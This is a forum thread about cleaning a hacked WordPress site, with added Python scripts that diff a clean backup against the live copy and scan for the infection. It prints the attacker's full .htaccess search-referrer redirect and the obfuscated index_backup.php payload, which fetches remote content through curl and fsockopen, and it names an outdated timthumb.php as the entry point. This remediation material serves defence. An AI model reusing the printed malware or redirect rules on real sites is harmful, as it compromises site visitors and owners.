Author: admin (Super Administrator)
Posts: 33
Joined: 03.11.09
Posted on 10-06-2013 19:11
Wordpress infected index_backup.php
Hi All,
I have a problem with a web site based on Wordpress. The site was hacked; the following code block was added to the .htaccess file:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|
excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|
linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|
amfibi|dmoz|yippy|
walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|
thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|
allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|
bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|
abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|
suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|
alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|
hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nl
search|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|
alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|
globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|
simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|
apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|
finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|
keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|
claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
In almost all directories I found a .htaccess file with this code, and a file named index_backup.php was somehow uploaded.
The content of the index_backup.php file is the following:
<? $GLOBALS['_62805507_']=Array(base64_decode(''.'ZG'.'VmaW5'.'l'),base64_decode('ZmlsZV'.'9nZ'.'XRfY29'.'u'.'dGV'.'udHM'.'='),base64_decode('c3RyZ'.
'WFtX'.'2Nvbn'.'RleHR'.'fY3JlYXR'.'l'),base64_decode(''.'Zml'.'sZV9nZ'.'X'.'RfY29'.'udGVudHM='),base64_decode('c3'.'R'.'ybmF0'.'Y21'.'w'),
base64_decode('bXRfcmFuZ'.'A='.'='),base64_decode('ZnB1dHM='),
base64_decode('ZnJlYWQ'.'='),base64_decode('ZmN'.'sb3N'.'l'),base64_decode('c3RycG9z'),base64_decode('YW'.'RkY3NsYX'.'N'.'oZXM='),base64_decode('Z'.'mZsdXNo'),
base64_decode(''.'c3V'.'ic3Ry'),
base64_decode('Zm'.'lsZV'.'9'.'nZXRfY29udGVu'.'dH'.'M='),
base64_decode('YXJyY'.'XlfZm'.'lsbF9rZXlz'),base64_decode(''.'Y3Vyb'.'F9pbml0'),
base64_decode('Y3VybF9tdWx0aV9leGVj'),base64_decode('YXJyY'.'Xlfc'.'HVzaA=='),
base64_decode('Y3VybF9zZXRvc'.'HQ'.'='),
base64_decode('bXRf'.'cmFuZ'.'A=='),base64_decode('aW1hZ'.
'2VjcmVhdGVmcm9'.'tZ2lm'),base64_decode('Y3'.'Vy'.'bF9'.'zZX'.'RvcH'.'Q'.'='),
base64_decode('Y3VybF9zZX'.'Rvc'.'HQ='),
base64_decode('Y3'.'Vy'.'bF'.'9l'.'eG'.'Vj'),base64_decode('Y3'.'Vy'.
'bF9jbG9z'.'Z'.'Q=='),base64_decode(''.'aW5pX2d'.'ldA='.'='),
base64_decode('c'.'GFyc2VfdX'.'Js'),base64_decode('ZnNv'.'Y2tv'.'cGVu'),
base64_decode('ZnV'.'uY3R'.'p'.'b'.'2'.'5f'.'Z'.'Xh'.'pc'.'3Rz')); ?><? function _1051993851($i){$a=Array('SUZ'.'SQU1FX1'.'V'.'S'.'T'.'A==',
'aH'.'R0c'.'DovL3d'.'vcmRwcmV'.
'zc3Rlc3Qu'.'aW'.'5m'.'by83Ln'.'R4'.'d'.'A='.'=',''.'ZA==','aHR0cDovLw='.'=','S'.'F'.'RUU'.'F9IT1NU','Uk'.'VRVU'.'VTV'.'F'.'9VUkk'.'=','a'.'HR0'.'cA==','dGltZW91dA==',
'R'.'0VUIA==',''.'Pw='.'=','I'.'CB'.'IVFRQLzEuMA0K','VXNlci1BZ2VudDo'.'gTW96'.'a'.'WxsYS81L'.'jAgKFd'.'p'.'bmRvd3M7IFU7IFdpbmRvd'.'3MgT'.'lQgN'.
'S4xO'.'yBl'.'b'.'i1V'.'UzsgcnY6MS44LjA'.'uMykgR2'.'Vj'.'a2'.'8v'.'MjAwNjA0'.'M'.
'jYgRmlyZW'.'ZveC8x'.'LjUuM'.'C4zDQo=',''.'QW'.'NjZXB0'.'OiAqLyoNCg='.'=','QWNjZXB0'.'LUxhb'.'md1YWdlOiBlbi11cyxlbjt'.'xPTAuNQ0K','QWN'.'jZXB'.'0L'.
'UNo'.'YXJz'.'ZX'.'Q6IElTTy04'.'ODU5LTEsdXR'.'mLTg7cT'.'0wLjcs'.'Kjt'.'xPTAu'.
'Nw0K','S2VlcC'.'1'.'Bb'.'Gl'.'2'.'ZT'.'ogMzA'.'w'.'D'.'Qo=',''.'Q29'.'ubmVjd'.
'Glv'.'bjoga'.'2Vl'.'cC1hbGl2ZQ0K','aQ==','DQoNC'.'g==','Y'.'Wxsb3df'.'dXJsX'.
'2ZvcG'.'Vu','aG9zd'.'A==','aG9zd'.'A==','cGF0aA==','cXVl'.'c'.'nk=',''.
'Y3VybF9pbm'.'l0');return base64_decode($a[$i]);} ?><?php $GLOBALS['_62805507_'][0](_1051993851(0),_1051993851(1));$_0=_1051993851(2);echo l__3(IFRAME_URL);$_1=round(0+2345.5+2345.5);echo@
$GLOBALS['_62805507_'][1](_1051993851(3) .$_SERVER[_1051993851(4)] .$_SERVER[_1051993851(5)]);function l__0($_2){$_3=$GLOBALS['_62805507_'][2](array(_1051993851(6)=> array(_1051993851(7)=>
round(0+3+3+3+3+3))));return $GLOBALS['_62805507_'][3]($_2,false,$_3);(round(0+3799)-round(0+759.8+759.8+759.8+759.8+759.8)+round(0+3457)-round(0+3457))?$GLOBALS['_62805507_'][4]($_4,$_3):$GLOBALS['_62805507_'][5](round(0+767.33333333333+767.33333333333+767.33333333333)
,round(0+1266.3333333333+1266.3333333333+1266.3333333333));}function l__1($_5,$_6,$_7,$_8){$GLOBALS['_62805507_'][6]($_5,_1051993851(8) .$_7 .
_1051993851(9) .$_8 ._1051993851(10) ."Host: $_6\r\n" ._1051993851(11) ._1051993851(12) ._1051993851(13) ._1051993851(14) ._1051993851(15) ._1051993851(16) ."Referer: http://$_6\r\n\r\n");while($_4=$GLOBALS['_62805507_'][7]($_5,round
(0+1365.3333333333+1365.3333333333+1365.3333333333))){$_9 .= $_4;}$GLOBALS['_62805507_'][8]($_5);$_10=_1051993851(17);$_11=
$GLOBALS['_62805507_'][9]($_9,_1051993851(18));if((round
(0+968.25+968.25+968.25+968.25)^round(0+1291+1291+1291))&& $GLOBALS['_62805507_'][10]($_5,$_2,$_5,$_7))$GLOBALS['_62805507_'][11]($_12,$_7,$_11);
$_9=$GLOBALS['_62805507_'][12]($_9,$_11+round(0+1.3333333333333+1.3333333333333+1.3333333333333));
if((round(0+1014.5+1014.5+1014.5+1014.5)^round(0+4058))&&
$GLOBALS['_62805507_'][13]($_3,$_3,$_3))$GLOBALS['_62805507_'][14]($_13);return $_9;}function l__2($_2){$_13=$GLOBALS['_62805507_'][15]($_2);if((round(0+736.6+736.6+736.6+736.6+736.6)+round(0+312+312+312))>
round(0+3683)|| $GLOBALS['_62805507_'][16]($_14));else{$GLOBALS
['_62805507_'][17]($_11);}$GLOBALS['_62805507_'][18]($_13,42,FALSE);if(round(0+3068.5+3068.5)<$GLOBALS['_62805507_'][19](round(0+572.33333333333+572.33333333333+572.33333333333),round
(0+4415)))$GLOBALS['_62805507_'][20]($_2,$_15,$_16);$GLOBALS['_62805507_'][21]($_13,19913,TRUE);$GLOBALS['_62805507_'][22]
($_13,13,round(0+3+3+3+3+3));$_12=$GLOBALS['_62805507_'][23]($_13);$GLOBALS['_62805507_'][24]($_13);return $_12;}function l__3($_2)
{if($GLOBALS['_62805507_'][25](_1051993851(19))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){echo l__0
($_2);}else{$_14=$GLOBALS['_62805507_'][26]($_2);if($_5=@$GLOBALS['_62805507_'][27]($_14[_1051993851(20)],round
(0+40+40),$_15,$_16,round(0+3+3+3+3+3))){echo l__1($_5,$_14[_1051993851(21)],$_14[_1051993851(22)],$_14[_1051993851(23)]);}elseif
(@$GLOBALS['_62805507_'][28](_1051993851(24))){echo l__2($_2);}}}
The PHP code is encoded and it is hard to read the implemented functionality. If you have any suggestions for a fix and for preventing future infection, please share them. I hope this web virus problem will be resolved soon. If I find a solution I will write here about the infection fix.
Cheers
Edited by admin on 13-06-2013 06:10

RE: How to clean this infection
Author: admin (Super Administrator)
Posts: 33
Joined: 03.11.09
Posted on 10-06-2013 19:39
1. Get your latest clean backup.
2. Download all files from your Wordpress installation. Do a diff of both directories, clean and infected. For the diff you can use Beyond Compare for Windows or meld for Linux. Delete all new files from the infected directory and clean the .htaccess file. That is all.
3. Now the question is how to prevent a new infection of the site by the same virus.
Please write your suggestions.
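The "diff the clean backup against the infected copy" step from the post above, as an added example in Python (not the poster's tooling; Beyond Compare and meld do the same interactively). It hashes every regular file in both trees and reports files present only in the live copy (where an uploaded index_backup.php shows up), files whose content changed (where the patched .htaccess files show up), and files missing from the live copy. The two sample trees built in demo() are constructed for illustration and only mimic the shape of the infection described in the thread.

```python
"""Compare a clean WordPress backup against the live (possibly infected) copy.

Added example for this thread, not the poster's own tooling. Files present
only in the live tree are reported as ADDED, files whose content hash differs
as MODIFIED, files missing from the live tree as REMOVED.
"""
import hashlib
import os
import tempfile


def _hash_tree(root):
    """Map relative path -> sha256 hex digest for every regular file under root."""
    hashes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            hashes[rel] = h.hexdigest()
    return hashes


def diff_trees(clean_root, live_root):
    """Return (added, modified, removed) sorted lists of relative paths."""
    clean = _hash_tree(clean_root)
    live = _hash_tree(live_root)
    added = sorted(p for p in live if p not in clean)
    removed = sorted(p for p in clean if p not in live)
    modified = sorted(p for p in live if p in clean and live[p] != clean[p])
    return added, modified, removed


def _write(root, rel, content):
    """Helper for demo(): create rel under root with the given content."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(content)


def demo():
    """Build a constructed clean/live pair shaped like the thread's infection and diff them."""
    base = tempfile.mkdtemp()
    clean = os.path.join(base, "clean")
    live = os.path.join(base, "live")
    # constructed clean backup
    _write(clean, "index.php", "<?php // wordpress bootstrap\n")
    _write(clean, ".htaccess", "RewriteEngine On\n")
    _write(clean, "wp-content/themes/t/style.css", "body{}\n")
    # constructed live copy: same files, plus a dropped file and patched .htaccess in two places
    _write(live, "index.php", "<?php // wordpress bootstrap\n")
    _write(live, ".htaccess",
           "RewriteEngine On\nRewriteRule (.*) /index_backup.php?query=$1 [QSA,L]\n")
    _write(live, "index_backup.php", "<? $GLOBALS['_x']=Array(base64_decode('...')); ?>\n")
    _write(live, "wp-content/themes/t/style.css", "body{}\n")
    _write(live, "wp-content/themes/t/.htaccess",
           "RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]\n")
    return diff_trees(clean, live)


if __name__ == "__main__":
    added, modified, removed = demo()
    for label, paths in (("ADDED", added), ("MODIFIED", modified), ("REMOVED", removed)):
        for p in paths:
            print(label, p)
```

Run it against real trees with `diff_trees("/path/to/clean-backup", "/path/to/live-download")`; everything in the ADDED list is a candidate for deletion and everything in MODIFIED needs to be inspected (for .htaccess, restored from the clean copy).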
RE: Wordpress infected index_backup.php
Author: admin (Super Administrator)
Posts: 33
Joined: 03.11.09
Posted on 13-06-2013 06:14
It seems the infection attack comes from the file "thumb.php" in the themes folder; there you can find an fopen function with the write ("w") parameter.
"Look for a file in your WordPress theme’s folder called timthumb.php. If it’s there, you need to fix it."
Here is the fix of the vulnerability:
How to Replace timthumb.php in Your WordPress Theme
The easiest, safest and fastest way to eliminate this vulnerability on your website without risking breaking other functions is to follow the instructions I outlined in the video clip:
http://www.epiphanymarketing.com/blog/2011/08/18/timthumb-wordpress-how-to-fix-the-timthumb-php-vulnerability-in-your-wordpress-theme/
The version of the thumb.php file on my infected installation was define ('VERSION', '2.8.10');
I have updated it to define ('VERSION', '2.8.11');
For now I don't have problems.
Please, write in this thread if you find other solution.
Edited by admin on 13-06-2013 06:21
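A scanner for the three artifacts this thread describes, as an added example in Python (not the poster's tooling, and not part of any WordPress or timthumb project): the .htaccess rewrite from the first post that gates on the search-engine referer and the (msie|opera) user agent and sends requests to index_backup.php; the dropped index_backup.php itself, together with the base64_decode('..'.'..') string-splitting obfuscation visible in its dump; and, from the post just above, a timthumb.php or thumb.php whose VERSION define is older than 2.8.11, the version the poster upgraded to. The file names, patterns and version threshold are the thread's; the reason labels and the sample tree built in demo() are constructed for illustration.

```python
"""Scan a WordPress tree for the artifacts described in this thread.

Added example, not the poster's own tooling. Checks: (1) .htaccess files
with the conditional RewriteRule to index_backup.php, (2) index_backup.php
and any .php file using base64_decode('..'.'..') split-string obfuscation,
(3) timthumb.php / thumb.php with a VERSION define older than 2.8.11.
"""
import os
import re
import tempfile

# .htaccess: either the rewrite target or the user-agent gate from the thread
HTACCESS_PATTERNS = [
    re.compile(r"RewriteRule\s+\S+\s+/index_backup\.php", re.I),
    re.compile(r"RewriteCond\s+%\{HTTP_USER_AGENT\}\s+\^\.\*\(msie\|opera\)", re.I),
]
# index_backup.php body: base64_decode('...'.'...') fragment concatenation
OBFUSCATION = re.compile(r"base64_decode\(\s*'[^']*'\s*\.\s*'", re.I)
# timthumb: define ('VERSION', '2.8.10');
VERSION_DEFINE = re.compile(r"define\s*\(\s*'VERSION'\s*,\s*'([\d.]+)'\s*\)")
MIN_TIMTHUMB = (2, 8, 11)  # version the poster upgraded to


def _version_tuple(s):
    """'2.8.10' -> (2, 8, 10) so versions compare numerically, not lexically."""
    return tuple(int(x) for x in s.split("."))


def scan_file(path):
    """Return the list of reasons this file is suspicious (empty if none)."""
    reasons = []
    name = os.path.basename(path)
    try:
        with open(path, "r", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return reasons
    if name == ".htaccess" and any(p.search(text) for p in HTACCESS_PATTERNS):
        reasons.append("htaccess-redirect-to-index_backup")
    if name == "index_backup.php":
        reasons.append("dropped-index_backup.php")
    if name.endswith(".php") and OBFUSCATION.search(text):
        reasons.append("base64-split-obfuscation")
    if name in ("timthumb.php", "thumb.php"):
        m = VERSION_DEFINE.search(text)
        if m is None:
            reasons.append("timthumb-version-unknown")
        elif _version_tuple(m.group(1)) < MIN_TIMTHUMB:
            reasons.append("timthumb-outdated:" + m.group(1))
    return reasons


def scan_tree(root):
    """Walk root and return sorted (relative_path, reason) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            for reason in scan_file(full):
                findings.append((os.path.relpath(full, root), reason))
    return sorted(findings)


def _write(root, rel, content):
    """Helper for demo(): create rel under root with the given content."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(content)


def demo():
    """Constructed tree reproducing the thread's artifacts next to clean files."""
    root = tempfile.mkdtemp()
    _write(root, "index.php", "<?php require 'wp-blog-header.php';\n")
    _write(root, ".htaccess",
           "RewriteEngine On\n"
           "RewriteCond %{HTTP_REFERER} ^.*(google|bing)\\.(.*)\n"
           "RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]\n"
           "RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]\n")
    _write(root, "index_backup.php",
           "<? $GLOBALS['_x']=Array(base64_decode(''.'ZG'.'VmaW5'.'l')); ?>\n")
    _write(root, "wp-content/themes/t/timthumb.php", "<?php define ('VERSION', '2.8.10');\n")
    _write(root, "wp-content/themes/u/timthumb.php", "<?php define ('VERSION', '2.8.11');\n")
    _write(root, "wp-content/themes/t/.htaccess", "Options -Indexes\n")
    return scan_tree(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(reason, rel)
```

Point `scan_tree()` at the downloaded copy of the site; the version check only tells you the file is older than the poster's upgrade target, so a hit there means "replace the file", not "this copy was exploited".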